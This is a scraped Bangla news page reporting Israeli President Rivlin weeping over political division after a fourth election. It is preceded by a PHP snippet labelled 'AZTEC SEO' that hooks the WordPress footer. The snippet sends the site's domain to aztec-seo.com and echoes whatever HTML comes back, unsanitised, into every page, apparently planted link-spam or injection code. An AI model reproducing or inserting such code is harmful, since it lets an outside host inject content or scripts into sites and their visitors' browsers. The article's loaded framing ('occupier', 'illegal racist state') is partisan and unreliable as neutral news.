/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); চরম গৃহবিবাদে দখলদার ইসরাইল; প্রেসিডেন্টের কান্নাকাটি | Dhaka Sky News

ইরানবিরোধী লবিংয়ের জন্য আমেরিকা সফরে যাচ্ছেন মোসাদ প্রধান

আগের সংবাদ

বিজ্ঞান ও প্রযুক্তি ক্ষেত্রে স্বনির্ভরতার পথে ইরান, এটা গর্বের: প্রেসিডেন্ট রুহানি

পরের সংবাদ

চরম গৃহবিবাদে দখলদার ইসরাইল; প্রেসিডেন্টের কান্নাকাটি

ঢাকা স্কাইনিউজ ডেস্ক

প্রকাশিত: April 8, 2021 , 9:54 pm

দখলদার ইসরাইলের অভ্যন্তরীণ চরম রাজনৈতিক বিভক্তিতে উদ্বেগ প্রকাশ করেছেন প্রেসিডেন্ট রিউভেন রিভলিন।

ইসরাইলি দৈনিক জেরুজালেম পোস্ট জানিয়েছে, দখলদারদের প্রেসিডেন্ট বলেছেন অভ্যন্তরীণ যে বিরোধ তৈরি হয়েছে তা বিপজ্জনক। তিনি এই কথা বলার সময় কেঁদে দেন।

রিভলিন সাত বছর ধরে প্রেসিডেন্টের পদে এবং এরও আগে ১৩ বছর সংসদ স্পিকার হিসেবে দায়িত্ব পালনকে তার নিজের জন্য দুঃখজনক হিসেবে বর্ণনা করেন। তিনি সতর্ক করে বলেন, রাজনৈতিক অঙ্গনে তৎপরতার বিষয়ে একটি কাঠামো গড়ে না উঠলে ইসরাইলের অস্তিত্বই হুমকির মুখে পড়বে।

কিছু দিন আগে ইসরাইলে সংসদ নির্বাচন অনুষ্ঠিত হয়েছে। গত দুই বছরে এটি চতুর্থ সংসদ নির্বাচন। তবে সর্বশেষ সংসদ নির্বাচনেও কোনো দল একক সংখ্যাগরিষ্ঠতা পায়নি।

এর ফলে এবারও নতুন সরকার গঠন নিয়ে সংকট দেখা দিয়েছে অবৈধ এই বর্ণবাদী রাষ্ট্রে। বলা হচ্ছে দুই বছরের মধ্যে পঞ্চম সংসদ নির্বাচন হতে পারে ইসরাইলে। অবশ্য এমন সংকটের মধ্যেও ফিলিস্তিনসহ গোটা বিশ্বে অপতৎপরতা অব্যাহত রেখেছে তারা। সূত্র : পার্সটুডে